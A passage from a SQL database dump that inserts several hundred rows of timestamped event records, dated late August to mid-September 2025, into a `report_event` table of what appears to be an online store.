(19715, '2025-08-30 20:13:01', 1, 2061, 0, 1, 1),
(19716, '2025-08-30 20:14:25', 1, 2060, 0, 1, 1),
(19717, '2025-08-31 02:16:46', 1, 2053, 0, 1, 1),
(19718, '2025-08-31 03:20:40', 1, 2053, 0, 1, 1),
(19719, '2025-08-31 03:31:55', 1, 2058, 0, 1, 1),
(19720, '2025-08-31 04:46:20', 1, 2064, 0, 1, 1),
(19721, '2025-08-31 06:38:11', 1, 2060, 0, 1, 1),
(19722, '2025-08-31 06:38:18', 1, 2059, 0, 1, 1),
(19723, '2025-08-31 07:55:20', 1, 2058, 0, 1, 1),
(19724, '2025-08-31 07:55:28', 1, 2064, 0, 1, 1),
(19725, '2025-08-31 07:55:35', 1, 2062, 0, 1, 1),
(19726, '2025-08-31 07:55:36', 1, 2055, 0, 1, 1),
(19727, '2025-08-31 07:55:38', 1, 2054, 0, 1, 1),
(19728, '2025-08-31 07:55:43', 1, 2059, 0, 1, 1),
(19729, '2025-08-31 07:55:44', 1, 2063, 0, 1, 1),
(19730, '2025-08-31 07:55:47', 1, 2060, 0, 1, 1),
(19731, '2025-08-31 07:55:48', 1, 2061, 0, 1, 1),
(19732, '2025-08-31 07:56:04', 1, 2058, 0, 1, 1),
(19733, '2025-08-31 07:56:10', 1, 2064, 0, 1, 1),
(19734, '2025-08-31 07:56:18', 1, 2062, 0, 1, 1),
(19735, '2025-08-31 07:56:21', 1, 2055, 0, 1, 1),
(19736, '2025-08-31 07:56:25', 1, 2059, 0, 1, 1),
(19737, '2025-08-31 07:56:26', 1, 2054, 0, 1, 1),
(19738, '2025-08-31 07:56:29', 1, 2063, 0, 1, 1),
(19739, '2025-08-31 07:56:30', 1, 2061, 0, 1, 1),
(19740, '2025-08-31 07:56:33', 1, 2060, 0, 1, 1),
(19741, '2025-08-31 07:56:43', 1, 2053, 0, 1, 1),
(19742, '2025-08-31 08:04:44', 1, 2053, 0, 1, 1),
(19743, '2025-08-31 09:10:58', 1, 2064, 0, 1, 1),
(19744, '2025-08-31 10:16:15', 1, 2061, 0, 1, 1),
(19745, '2025-08-31 10:21:28', 1, 2060, 0, 1, 1),
(19746, '2025-08-31 11:49:02', 1, 2055, 0, 1, 1),
(19747, '2025-08-31 12:20:30', 1, 2060, 0, 1, 1),
(19748, '2025-08-31 13:02:56', 1, 2063, 0, 1, 1),
(19749, '2025-08-31 15:31:21', 1, 2062, 0, 1, 1),
(19750, '2025-08-31 16:00:45', 1, 2063, 0, 1, 1),
(19751, '2025-08-31 16:04:36', 1, 2053, 0, 1, 1),
(19752, '2025-08-31 17:38:45', 1, 2061, 0, 1, 1),
(19753, '2025-08-31 20:49:12', 1, 2060, 0, 1, 1),
(19754, '2025-08-31 23:29:26', 1, 2060, 0, 1, 1),
(19755, '2025-09-01 01:01:52', 1, 2064, 0, 1, 1),
(19756, '2025-09-01 01:14:41', 1, 2063, 0, 1, 1),
(19757, '2025-09-01 01:52:37', 1, 2061, 0, 1, 1),
(19758, '2025-09-01 01:59:52', 1, 2064, 0, 1, 1),
(19759, '2025-09-01 03:34:54', 1, 2053, 0, 1, 1),
(19760, '2025-09-01 06:03:50', 1, 2060, 0, 1, 1),
(19761, '2025-09-01 06:17:18', 1, 2061, 0, 1, 1),
(19762, '2025-09-01 06:45:34', 1, 2053, 0, 1, 1),
(19763, '2025-09-01 07:29:49', 1, 2059, 0, 1, 1),
(19764, '2025-09-01 07:53:35', 1, 2060, 0, 1, 1),
(19765, '2025-09-01 08:00:52', 1, 2058, 0, 1, 1),
(19766, '2025-09-01 08:12:37', 1, 2055, 0, 1, 1),
(19767, '2025-09-01 08:20:36', 1, 2054, 0, 1, 1),
(19768, '2025-09-01 09:20:14', 1, 2062, 0, 1, 1),
(19769, '2025-09-01 10:46:19', 1, 2064, 0, 1, 1),
(19770, '2025-09-01 10:47:42', 1, 2058, 0, 1, 1),
(19771, '2025-09-01 12:00:48', 1, 2064, 0, 1, 1),
(19772, '2025-09-01 12:06:35', 1, 2054, 0, 1, 1),
(19773, '2025-09-01 12:09:16', 1, 2061, 0, 1, 1),
(19774, '2025-09-01 15:36:58', 1, 2062, 0, 1, 1),
(19775, '2025-09-01 20:10:58', 1, 2053, 0, 1, 1),
(19776, '2025-09-01 20:11:45', 1, 2062, 0, 1, 1),
(19777, '2025-09-01 20:14:53', 1, 2059, 0, 1, 1),
(19778, '2025-09-01 20:19:53', 1, 2054, 0, 1, 1),
(19779, '2025-09-01 20:59:08', 1, 2053, 0, 1, 1),
(19780, '2025-09-01 21:41:30', 1, 2054, 0, 1, 1),
(19781, '2025-09-02 01:53:44', 1, 2061, 0, 1, 1),
(19782, '2025-09-02 07:59:40', 1, 2062, 0, 1, 1),
(19783, '2025-09-02 08:30:28', 1, 2060, 0, 1, 1),
(19784, '2025-09-02 08:50:38', 1, 2058, 0, 1, 1),
(19785, '2025-09-02 10:19:02', 1, 2061, 0, 1, 1),
(19786, '2025-09-02 14:39:35', 1, 2060, 0, 1, 1),
(19787, '2025-09-02 14:42:16', 1, 2053, 0, 1, 1),
(19788, '2025-09-02 15:30:28', 1, 2062, 0, 1, 1),
(19789, '2025-09-02 15:31:37', 1, 2053, 0, 1, 1),
(19790, '2025-09-02 19:44:13', 1, 2058, 0, 1, 1),
(19791, '2025-09-02 19:44:22', 1, 2054, 0, 1, 1),
(19792, '2025-09-02 20:10:45', 1, 2061, 0, 1, 1),
(19793, '2025-09-02 21:57:32', 1, 2061, 0, 1, 1),
(19794, '2025-09-02 22:57:55', 1, 2060, 0, 1, 1),
(19795, '2025-09-02 23:47:07', 1, 2058, 0, 1, 1),
(19796, '2025-09-03 08:08:10', 1, 2054, 0, 1, 1),
(19797, '2025-09-03 08:08:13', 1, 2055, 0, 1, 1),
(19798, '2025-09-03 08:08:19', 1, 2064, 0, 1, 1),
(19799, '2025-09-03 08:08:22', 1, 2063, 0, 1, 1),
(19800, '2025-09-03 08:08:24', 1, 2062, 0, 1, 1),
(19801, '2025-09-03 08:08:26', 1, 2060, 0, 1, 1),
(19802, '2025-09-03 08:08:29', 1, 2059, 0, 1, 1),
(19803, '2025-09-03 08:08:32', 1, 2061, 0, 1, 1),
(19804, '2025-09-03 08:08:34', 1, 2058, 0, 1, 1),
(19805, '2025-09-03 09:17:45', 1, 2055, 0, 1, 1),
(19806, '2025-09-03 09:34:06', 1, 2064, 0, 1, 1),
(19807, '2025-09-03 10:27:16', 1, 2063, 0, 1, 1),
(19808, '2025-09-03 10:51:30', 1, 2064, 0, 1, 1),
(19809, '2025-09-03 11:01:42', 1, 2062, 0, 1, 1),
(19810, '2025-09-03 13:32:15', 1, 2061, 0, 1, 1),
(19811, '2025-09-03 13:50:25', 1, 2060, 0, 1, 1),
(19812, '2025-09-03 15:18:09', 1, 2062, 0, 1, 1),
(19813, '2025-09-03 16:36:19', 1, 2064, 0, 1, 1),
(19814, '2025-09-03 18:57:09', 1, 2060, 0, 1, 1),
(19815, '2025-09-03 19:14:39', 1, 2061, 0, 1, 1),
(19816, '2025-09-03 21:30:34', 1, 2060, 0, 1, 1),
(19817, '2025-09-03 22:32:41', 1, 2061, 0, 1, 1),
(19818, '2025-09-03 22:34:50', 1, 2064, 0, 1, 1),
(19819, '2025-09-03 23:19:44', 1, 2054, 0, 1, 1),
(19820, '2025-09-03 23:28:25', 1, 2063, 0, 1, 1),
(19821, '2025-09-04 00:43:38', 1, 2058, 0, 1, 1),
(19822, '2025-09-04 01:27:53', 1, 2059, 0, 1, 1),
(19823, '2025-09-04 02:14:07', 1, 2061, 0, 1, 1),
(19824, '2025-09-04 05:14:29', 1, 2063, 0, 1, 1),
(19825, '2025-09-04 06:53:12', 1, 2062, 0, 1, 1),
(19826, '2025-09-04 12:13:25', 1, 2064, 0, 1, 1),
(19827, '2025-09-04 13:24:09', 1, 2061, 0, 1, 1),
(19828, '2025-09-04 15:24:55', 1, 2062, 0, 1, 1),
(19829, '2025-09-04 17:43:48', 1, 2059, 0, 1, 1),
(19830, '2025-09-04 22:27:13', 1, 2064, 0, 1, 1),
(19831, '2025-09-04 23:49:30', 1, 2060, 0, 1, 1),
(19832, '2025-09-05 01:45:15', 1, 2053, 0, 1, 1),
(19833, '2025-09-05 02:26:19', 1, 2064, 0, 1, 1),
(19834, '2025-09-05 02:38:50', 1, 2060, 0, 1, 1),
(19835, '2025-09-05 02:55:59', 1, 2060, 0, 1, 1),
(19836, '2025-09-05 04:01:48', 1, 2064, 0, 1, 1),
(19837, '2025-09-05 07:39:58', 1, 2061, 0, 1, 1),
(19838, '2025-09-05 09:13:12', 1, 2061, 0, 1, 1),
(19839, '2025-09-05 11:13:08', 1, 2060, 0, 1, 1),
(19840, '2025-09-05 15:34:30', 1, 2062, 0, 1, 1),
(19841, '2025-09-05 16:05:09', 1, 2064, 0, 1, 1),
(19842, '2025-09-05 20:07:45', 1, 2061, 0, 1, 1),
(19843, '2025-09-05 22:42:27', 1, 2063, 0, 1, 1),
(19844, '2025-09-05 22:42:30', 1, 2061, 0, 1, 1),
(19845, '2025-09-05 22:42:38', 1, 2062, 0, 1, 1),
(19846, '2025-09-05 23:59:46', 1, 2064, 0, 1, 1),
(19847, '2025-09-06 00:19:14', 1, 2063, 0, 1, 1),
(19848, '2025-09-06 01:53:34', 1, 2060, 0, 1, 1),
(19849, '2025-09-06 02:50:33', 1, 2061, 0, 1, 1),
(19850, '2025-09-06 03:04:31', 1, 2054, 0, 1, 1),
(19851, '2025-09-06 03:09:08', 1, 2055, 0, 1, 1),
(19852, '2025-09-06 03:19:33', 1, 2054, 0, 1, 1),
(19853, '2025-09-06 03:27:58', 1, 2062, 0, 1, 1),
(19854, '2025-09-06 03:49:23', 1, 2061, 0, 1, 1),
(19855, '2025-09-06 07:32:11', 1, 2064, 0, 1, 1),
(19856, '2025-09-06 08:16:36', 1, 2061, 0, 1, 1),
(19857, '2025-09-06 09:31:59', 1, 2064, 0, 1, 1),
(19858, '2025-09-06 09:43:40', 1, 2063, 0, 1, 1),
(19859, '2025-09-06 10:23:06', 1, 2060, 0, 1, 1),
(19860, '2025-09-06 10:46:04', 1, 2063, 0, 1, 1),
(19861, '2025-09-06 11:16:30', 1, 2058, 0, 1, 1),
(19862, '2025-09-06 11:51:29', 1, 2058, 0, 1, 1),
(19863, '2025-09-06 13:55:19', 1, 2064, 0, 1, 1),
(19864, '2025-09-06 14:41:26', 1, 2060, 0, 1, 1),
(19865, '2025-09-06 16:09:39', 1, 2064, 0, 1, 1),
(19866, '2025-09-06 16:21:19', 1, 2059, 0, 1, 1),
(19867, '2025-09-06 16:29:02', 1, 2058, 0, 1, 1),
(19868, '2025-09-06 17:29:00', 1, 2058, 0, 1, 1),
(19869, '2025-09-06 19:02:22', 1, 2063, 0, 1, 1),
(19870, '2025-09-06 22:18:24', 1, 2060, 0, 1, 1),
(19871, '2025-09-06 22:52:23', 1, 2053, 0, 1, 1),
(19872, '2025-09-06 23:13:16', 1, 2059, 0, 1, 1),
(19873, '2025-09-06 23:51:47', 1, 2061, 0, 1, 1),
(19874, '2025-09-07 01:28:27', 1, 2058, 0, 1, 1),
(19875, '2025-09-07 01:29:42', 1, 2055, 0, 1, 1),
(19876, '2025-09-07 01:32:47', 1, 2054, 0, 1, 1),
(19877, '2025-09-07 03:39:21', 1, 2061, 0, 1, 1),
(19878, '2025-09-07 03:43:49', 1, 2064, 0, 1, 1),
(19879, '2025-09-07 04:22:43', 1, 2064, 0, 1, 1),
(19880, '2025-09-07 04:35:45', 1, 2060, 0, 1, 1),
(19881, '2025-09-07 04:57:25', 1, 2064, 0, 1, 1),
(19882, '2025-09-07 06:27:58', 1, 2064, 0, 1, 1),
(19883, '2025-09-07 07:06:26', 1, 2059, 0, 1, 1),
(19884, '2025-09-07 07:06:30', 1, 2060, 0, 1, 1),
(19885, '2025-09-07 09:50:08', 1, 2061, 0, 1, 1),
(19886, '2025-09-07 11:37:22', 1, 2061, 0, 1, 1),
(19887, '2025-09-07 11:49:42', 1, 2055, 0, 1, 1),
(19888, '2025-09-07 13:30:22', 1, 2062, 0, 1, 1),
(19889, '2025-09-07 15:17:09', 1, 2058, 0, 1, 1),
(19890, '2025-09-07 15:17:14', 1, 2058, 0, 1, 1),
(19891, '2025-09-07 15:29:41', 1, 2064, 0, 1, 1),
(19892, '2025-09-07 17:33:22', 1, 2060, 0, 1, 1),
(19893, '2025-09-07 17:42:41', 1, 2063, 0, 1, 1),
(19894, '2025-09-07 18:09:24', 1, 2058, 0, 1, 1),
(19895, '2025-09-07 18:19:49', 1, 2060, 0, 1, 1),
(19896, '2025-09-07 19:06:08', 1, 2055, 0, 1, 1),
(19897, '2025-09-07 19:43:05', 1, 2061, 0, 1, 1),
(19898, '2025-09-07 19:45:41', 1, 2060, 0, 1, 1),
(19899, '2025-09-07 20:02:24', 1, 2064, 0, 1, 1),
(19900, '2025-09-07 20:26:34', 1, 2061, 0, 1, 1),
(19901, '2025-09-07 21:07:15', 1, 2062, 0, 1, 1),
(19902, '2025-09-07 22:27:36', 1, 2054, 0, 1, 1),
(19903, '2025-09-07 22:43:44', 1, 2059, 0, 1, 1),
(19904, '2025-09-07 22:56:36', 1, 2064, 0, 1, 1),
(19905, '2025-09-07 23:19:12', 1, 2058, 0, 1, 1),
(19906, '2025-09-07 23:35:01', 1, 2054, 0, 1, 1),
(19907, '2025-09-08 00:21:22', 1, 2060, 0, 1, 1),
(19908, '2025-09-08 01:31:37', 1, 2060, 0, 1, 1),
(19909, '2025-09-08 01:40:49', 1, 2063, 0, 1, 1),
(19910, '2025-09-08 02:09:51', 1, 2058, 0, 1, 1),
(19911, '2025-09-08 03:10:41', 1, 2055, 0, 1, 1),
(19912, '2025-09-08 04:35:26', 1, 2061, 0, 1, 1),
(19913, '2025-09-08 05:10:44', 1, 2060, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(19914, '2025-09-08 05:13:08', 1, 2062, 0, 1, 1),
(19915, '2025-09-08 06:36:11', 1, 2054, 0, 1, 1),
(19916, '2025-09-08 06:54:04', 1, 2059, 0, 1, 1),
(19917, '2025-09-08 06:54:05', 1, 2062, 0, 1, 1),
(19918, '2025-09-08 07:08:33', 1, 2064, 0, 1, 1),
(19919, '2025-09-08 07:10:10', 1, 2064, 0, 1, 1),
(19920, '2025-09-08 07:10:38', 1, 2061, 0, 1, 1),
(19921, '2025-09-08 08:15:29', 1, 2061, 0, 1, 1),
(19922, '2025-09-08 08:30:29', 1, 2060, 0, 1, 1),
(19923, '2025-09-08 12:05:43', 1, 2058, 0, 1, 1),
(19924, '2025-09-08 12:33:54', 1, 2061, 0, 1, 1),
(19925, '2025-09-08 13:18:43', 1, 2062, 0, 1, 1),
(19926, '2025-09-08 14:03:31', 1, 2060, 0, 1, 1),
(19927, '2025-09-08 14:12:20', 1, 2054, 0, 1, 1),
(19928, '2025-09-08 14:34:09', 1, 2060, 0, 1, 1),
(19929, '2025-09-08 15:31:04', 1, 2064, 0, 1, 1),
(19930, '2025-09-08 16:52:02', 1, 2059, 0, 1, 1),
(19931, '2025-09-08 19:10:08', 1, 2064, 0, 1, 1),
(19932, '2025-09-08 19:46:21', 1, 2061, 0, 1, 1),
(19933, '2025-09-09 02:29:49', 1, 2064, 0, 1, 1),
(19934, '2025-09-09 02:34:33', 1, 2063, 0, 1, 1),
(19935, '2025-09-09 03:03:00', 1, 2055, 0, 1, 1),
(19936, '2025-09-09 04:36:14', 1, 2063, 0, 1, 1),
(19937, '2025-09-09 06:40:37', 1, 2061, 0, 1, 1),
(19938, '2025-09-09 09:34:43', 1, 2063, 0, 1, 1),
(19939, '2025-09-09 10:43:16', 1, 2060, 0, 1, 1),
(19940, '2025-09-09 11:01:32', 1, 2060, 0, 1, 1),
(19941, '2025-09-09 11:11:33', 1, 2058, 0, 1, 1),
(19942, '2025-09-09 12:22:10', 1, 2055, 0, 1, 1),
(19943, '2025-09-09 13:28:57', 1, 2062, 0, 1, 1),
(19944, '2025-09-09 14:57:13', 1, 2061, 0, 1, 1),
(19945, '2025-09-09 14:59:30', 1, 2063, 0, 1, 1),
(19946, '2025-09-09 16:16:56', 1, 2064, 0, 1, 1),
(19947, '2025-09-09 18:09:05', 1, 2061, 0, 1, 1),
(19948, '2025-09-09 18:09:10', 1, 2058, 0, 1, 1),
(19949, '2025-09-09 18:09:12', 1, 2063, 0, 1, 1),
(19950, '2025-09-09 18:09:14', 1, 2059, 0, 1, 1),
(19951, '2025-09-09 18:09:17', 1, 2064, 0, 1, 1),
(19952, '2025-09-09 18:09:18', 1, 2062, 0, 1, 1),
(19953, '2025-09-09 18:09:23', 1, 2060, 0, 1, 1),
(19954, '2025-09-09 18:09:27', 1, 2054, 0, 1, 1),
(19955, '2025-09-09 18:09:29', 1, 2055, 0, 1, 1),
(19956, '2025-09-09 18:09:48', 1, 2053, 0, 1, 1),
(19957, '2025-09-09 19:47:23', 1, 2060, 0, 1, 1),
(19958, '2025-09-09 19:48:41', 1, 2054, 0, 1, 1),
(19959, '2025-09-09 19:48:49', 1, 2058, 0, 1, 1),
(19960, '2025-09-09 20:24:25', 1, 2064, 0, 1, 1),
(19961, '2025-09-09 21:11:19', 1, 2060, 0, 1, 1),
(19962, '2025-09-09 21:19:36', 1, 2064, 0, 1, 1),
(19963, '2025-09-09 22:45:28', 1, 2054, 0, 1, 1),
(19964, '2025-09-10 02:47:33', 1, 2064, 0, 1, 1),
(19965, '2025-09-10 04:19:04', 1, 2062, 0, 1, 1),
(19966, '2025-09-10 07:18:28', 1, 2061, 0, 1, 1),
(19967, '2025-09-10 09:23:38', 1, 2061, 0, 1, 1),
(19968, '2025-09-10 10:14:45', 1, 2064, 0, 1, 1),
(19969, '2025-09-10 10:15:21', 1, 2062, 0, 1, 1),
(19970, '2025-09-10 10:15:35', 1, 2055, 0, 1, 1),
(19971, '2025-09-10 10:15:48', 1, 2061, 0, 1, 1),
(19972, '2025-09-10 10:16:16', 1, 2062, 0, 1, 1),
(19973, '2025-09-10 10:16:45', 1, 2061, 0, 1, 1),
(19974, '2025-09-10 10:38:02', 1, 2059, 0, 1, 1),
(19975, '2025-09-10 10:40:07', 1, 2060, 0, 1, 1),
(19976, '2025-09-10 10:40:38', 1, 2063, 0, 1, 1),
(19977, '2025-09-10 10:40:48', 1, 2054, 0, 1, 1),
(19978, '2025-09-10 10:41:38', 1, 2054, 0, 1, 1),
(19979, '2025-09-10 10:41:49', 1, 2064, 0, 1, 1),
(19980, '2025-09-10 10:42:44', 1, 2064, 0, 1, 1),
(19981, '2025-09-10 10:45:32', 1, 2058, 0, 1, 1),
(19982, '2025-09-10 11:36:38', 1, 2059, 0, 1, 1),
(19983, '2025-09-10 11:42:14', 1, 2061, 0, 1, 1),
(19984, '2025-09-10 13:50:01', 1, 2060, 0, 1, 1),
(19985, '2025-09-10 14:27:15', 1, 2064, 0, 1, 1),
(19986, '2025-09-10 14:36:48', 1, 2062, 0, 1, 1),
(19987, '2025-09-10 15:47:18', 1, 2054, 0, 1, 1),
(19988, '2025-09-10 16:13:56', 1, 2064, 0, 1, 1),
(19989, '2025-09-10 16:46:29', 1, 2064, 0, 1, 1),
(19990, '2025-09-10 19:07:13', 1, 2062, 0, 1, 1),
(19991, '2025-09-10 21:32:16', 1, 2060, 0, 1, 1),
(19992, '2025-09-10 22:26:35', 1, 2061, 0, 1, 1),
(19993, '2025-09-10 23:58:23', 1, 2060, 0, 1, 1),
(19994, '2025-09-11 01:17:46', 1, 2062, 0, 1, 1),
(19995, '2025-09-11 01:28:42', 1, 2061, 0, 1, 1),
(19996, '2025-09-11 01:37:41', 1, 2055, 0, 1, 1),
(19997, '2025-09-11 02:27:13', 1, 2061, 0, 1, 1),
(19998, '2025-09-11 02:36:26', 1, 2064, 0, 1, 1),
(19999, '2025-09-11 02:38:14', 1, 2060, 0, 1, 1),
(20000, '2025-09-11 05:46:50', 1, 2060, 0, 1, 1),
(20001, '2025-09-11 07:38:13', 1, 2064, 0, 1, 1),
(20002, '2025-09-11 07:46:32', 1, 2063, 0, 1, 1),
(20003, '2025-09-11 08:08:16', 1, 2054, 0, 1, 1),
(20004, '2025-09-11 08:27:01', 1, 2063, 0, 1, 1),
(20005, '2025-09-11 14:18:21', 1, 2062, 0, 1, 1),
(20006, '2025-09-11 14:40:51', 1, 2064, 0, 1, 1),
(20007, '2025-09-11 15:10:13', 1, 2060, 0, 1, 1),
(20008, '2025-09-11 15:17:02', 1, 2061, 0, 1, 1),
(20009, '2025-09-11 16:28:25', 1, 2059, 0, 1, 1),
(20010, '2025-09-11 16:37:53', 1, 2059, 0, 1, 1),
(20011, '2025-09-11 16:38:47', 1, 2059, 0, 1, 1),
(20012, '2025-09-11 16:39:14', 1, 2059, 0, 1, 1),
(20013, '2025-09-11 17:02:36', 1, 2059, 0, 1, 1),
(20014, '2025-09-11 17:40:14', 1, 2059, 0, 1, 1),
(20015, '2025-09-11 19:29:51', 1, 2064, 0, 1, 1),
(20016, '2025-09-11 19:47:29', 1, 2059, 0, 1, 1),
(20017, '2025-09-11 19:58:17', 1, 2058, 0, 1, 1),
(20018, '2025-09-11 20:03:04', 1, 2061, 0, 1, 1),
(20019, '2025-09-11 22:25:50', 1, 2061, 0, 1, 1),
(20020, '2025-09-12 00:01:41', 1, 2064, 0, 1, 1),
(20021, '2025-09-12 01:39:34', 1, 2053, 0, 1, 1),
(20022, '2025-09-12 01:52:41', 1, 2062, 0, 1, 1),
(20023, '2025-09-12 01:57:43', 1, 2060, 0, 1, 1),
(20024, '2025-09-12 05:34:45', 1, 2064, 0, 1, 1),
(20025, '2025-09-12 06:40:48', 1, 2060, 0, 1, 1),
(20026, '2025-09-12 07:27:42', 1, 2060, 0, 1, 1),
(20027, '2025-09-12 07:32:14', 1, 2064, 0, 1, 1),
(20028, '2025-09-12 07:50:11', 1, 2061, 0, 1, 1),
(20029, '2025-09-12 08:45:54', 1, 2064, 0, 1, 1),
(20030, '2025-09-12 08:53:43', 1, 2062, 0, 1, 1),
(20031, '2025-09-12 12:52:38', 1, 2060, 0, 1, 1),
(20032, '2025-09-12 14:20:44', 1, 2062, 0, 1, 1),
(20033, '2025-09-12 14:50:51', 1, 2063, 0, 1, 1),
(20034, '2025-09-12 16:51:27', 1, 2061, 0, 1, 1),
(20035, '2025-09-12 16:58:57', 1, 2060, 0, 1, 1),
(20036, '2025-09-12 19:22:14', 1, 2059, 0, 1, 1),
(20037, '2025-09-12 21:18:16', 1, 2058, 0, 1, 1),
(20038, '2025-09-12 21:51:55', 1, 2064, 0, 1, 1),
(20039, '2025-09-12 22:40:46', 1, 2062, 0, 1, 1),
(20040, '2025-09-12 22:40:50', 1, 2063, 0, 1, 1),
(20041, '2025-09-12 22:40:54', 1, 2061, 0, 1, 1),
(20042, '2025-09-12 23:35:46', 1, 2064, 0, 1, 1),
(20043, '2025-09-13 00:38:39', 1, 2060, 0, 1, 1),
(20044, '2025-09-13 03:51:01', 1, 2059, 0, 1, 1),
(20045, '2025-09-13 05:35:54', 1, 2064, 0, 1, 1),
(20046, '2025-09-13 06:04:45', 1, 2064, 0, 1, 1),
(20047, '2025-09-13 10:59:07', 1, 2061, 0, 1, 1),
(20048, '2025-09-13 13:43:04', 1, 2062, 0, 1, 1),
(20049, '2025-09-13 14:12:52', 1, 2061, 0, 1, 1),
(20050, '2025-09-13 15:06:36', 1, 2054, 0, 1, 1),
(20051, '2025-09-13 16:55:29', 1, 2060, 0, 1, 1),
(20052, '2025-09-13 17:39:57', 1, 2064, 0, 1, 1),
(20053, '2025-09-13 17:48:22', 1, 2060, 0, 1, 1),
(20054, '2025-09-14 01:20:35', 1, 2064, 0, 1, 1),
(20055, '2025-09-14 04:40:34', 1, 2064, 0, 1, 1),
(20056, '2025-09-14 04:41:47', 1, 2060, 0, 1, 1),
(20057, '2025-09-14 06:43:31', 1, 2059, 0, 1, 1),
(20058, '2025-09-14 06:43:34', 1, 2060, 0, 1, 1),
(20059, '2025-09-14 06:45:59', 1, 2053, 0, 1, 1),
(20060, '2025-09-14 07:28:42', 1, 2061, 0, 1, 1),
(20061, '2025-09-14 07:44:04', 1, 2060, 0, 1, 1),
(20062, '2025-09-14 08:40:34', 1, 2055, 0, 1, 1),
(20063, '2025-09-14 08:51:58', 1, 2063, 0, 1, 1),
(20064, '2025-09-14 10:42:36', 1, 2064, 0, 1, 1),
(20065, '2025-09-14 11:45:47', 1, 2055, 0, 1, 1),
(20066, '2025-09-14 12:02:07', 1, 2054, 0, 1, 1),
(20067, '2025-09-14 12:02:10', 1, 2055, 0, 1, 1),
(20068, '2025-09-14 12:02:11', 1, 2061, 0, 1, 1),
(20069, '2025-09-14 12:02:14', 1, 2058, 0, 1, 1),
(20070, '2025-09-14 12:02:15', 1, 2064, 0, 1, 1),
(20071, '2025-09-14 12:02:16', 1, 2059, 0, 1, 1),
(20072, '2025-09-14 12:02:17', 1, 2063, 0, 1, 1),
(20073, '2025-09-14 12:02:19', 1, 2062, 0, 1, 1),
(20074, '2025-09-14 12:02:24', 1, 2060, 0, 1, 1),
(20075, '2025-09-14 12:02:28', 1, 2053, 0, 1, 1),
(20076, '2025-09-14 12:36:39', 1, 2054, 0, 1, 1),
(20077, '2025-09-14 15:17:05', 1, 2064, 0, 1, 1),
(20078, '2025-09-14 15:31:50', 1, 2062, 0, 1, 1),
(20079, '2025-09-14 18:54:23', 1, 2058, 0, 1, 1),
(20080, '2025-09-14 20:54:51', 1, 2061, 0, 1, 1),
(20081, '2025-09-14 20:57:50', 1, 2061, 0, 1, 1),
(20082, '2025-09-14 20:58:04', 1, 2060, 0, 1, 1),
(20083, '2025-09-14 21:06:09', 1, 2064, 0, 1, 1),
(20084, '2025-09-14 21:08:44', 1, 2064, 0, 1, 1),
(20085, '2025-09-14 21:47:02', 1, 2054, 0, 1, 1),
(20086, '2025-09-14 22:00:17', 1, 2062, 0, 1, 1),
(20087, '2025-09-14 22:00:22', 1, 2061, 0, 1, 1),
(20088, '2025-09-14 22:00:26', 1, 2064, 0, 1, 1),
(20089, '2025-09-14 22:00:28', 1, 2054, 0, 1, 1),
(20090, '2025-09-14 22:01:04', 1, 2063, 0, 1, 1),
(20091, '2025-09-14 22:01:06', 1, 2058, 0, 1, 1),
(20092, '2025-09-14 22:01:23', 1, 2060, 0, 1, 1),
(20093, '2025-09-14 22:02:20', 1, 2059, 0, 1, 1),
(20094, '2025-09-14 22:16:21', 1, 2060, 0, 1, 1),
(20095, '2025-09-15 00:03:56', 1, 2059, 0, 1, 1),
(20096, '2025-09-15 03:29:57', 1, 2062, 0, 1, 1),
(20097, '2025-09-15 06:06:12', 1, 2061, 0, 1, 1),
(20098, '2025-09-15 06:09:16', 1, 2060, 0, 1, 1),
(20099, '2025-09-15 06:46:34', 1, 2064, 0, 1, 1),
(20100, '2025-09-15 07:18:41', 1, 2061, 0, 1, 1),
(20101, '2025-09-15 08:23:01', 1, 2055, 0, 1, 1),
(20102, '2025-09-15 08:23:04', 1, 2063, 0, 1, 1),
(20103, '2025-09-15 08:23:07', 1, 2062, 0, 1, 1),
(20104, '2025-09-15 08:23:10', 1, 2060, 0, 1, 1),
(20105, '2025-09-15 08:48:46', 1, 2058, 0, 1, 1),
(20106, '2025-09-15 12:22:49', 1, 2055, 0, 1, 1),
(20107, '2025-09-15 12:29:47', 1, 2061, 0, 1, 1),
(20108, '2025-09-15 13:45:38', 1, 2064, 0, 1, 1),
(20109, '2025-09-15 14:28:26', 1, 2055, 0, 1, 1),
(20110, '2025-09-15 14:46:43', 1, 2064, 0, 1, 1),
(20111, '2025-09-15 15:10:59', 1, 2064, 0, 1, 1),
(20112, '2025-09-15 15:18:28', 1, 2062, 0, 1, 1),
(20113, '2025-09-15 16:37:49', 1, 2064, 0, 1, 1),
(20114, '2025-09-15 21:00:07', 1, 2060, 0, 1, 1),
(20115, '2025-09-15 21:00:26', 1, 2058, 0, 1, 1),
(20116, '2025-09-15 21:01:43', 1, 2064, 0, 1, 1),
(20117, '2025-09-15 21:02:17', 1, 2059, 0, 1, 1),
(20118, '2025-09-15 21:06:49', 1, 2055, 0, 1, 1),
(20119, '2025-09-15 21:12:52', 1, 2061, 0, 1, 1),
(20120, '2025-09-15 21:14:47', 1, 2061, 0, 1, 1),
(20121, '2025-09-15 21:17:41', 1, 2053, 0, 1, 1),
(20122, '2025-09-15 21:24:04', 1, 2053, 0, 1, 1),
(20123, '2025-09-15 21:33:28', 1, 2054, 0, 1, 1),
(20124, '2025-09-15 21:52:27', 1, 2053, 0, 1, 1),
(20125, '2025-09-15 21:53:56', 1, 2055, 0, 1, 1),
(20126, '2025-09-15 22:00:41', 1, 2063, 0, 1, 1),
(20127, '2025-09-16 02:15:54', 1, 2060, 0, 1, 1),
(20128, '2025-09-16 02:18:44', 1, 2060, 0, 1, 1),
(20129, '2025-09-16 02:47:49', 1, 2064, 0, 1, 1),
(20130, '2025-09-16 02:56:18', 1, 2063, 0, 1, 1),
(20131, '2025-09-16 02:59:47', 1, 2058, 0, 1, 1),
(20132, '2025-09-16 06:55:05', 1, 2060, 0, 1, 1),
(20133, '2025-09-16 08:45:08', 1, 2062, 0, 1, 1),
(20134, '2025-09-16 08:52:59', 1, 2061, 0, 1, 1),
(20135, '2025-09-16 09:05:46', 1, 2055, 0, 1, 1),
(20136, '2025-09-16 09:14:17', 1, 2054, 0, 1, 1),
(20137, '2025-09-16 10:45:45', 1, 2064, 0, 1, 1),
(20138, '2025-09-16 11:10:01', 1, 2060, 0, 1, 1),
(20139, '2025-09-16 11:19:07', 1, 2063, 0, 1, 1),
(20140, '2025-09-16 11:25:23', 1, 2058, 0, 1, 1),
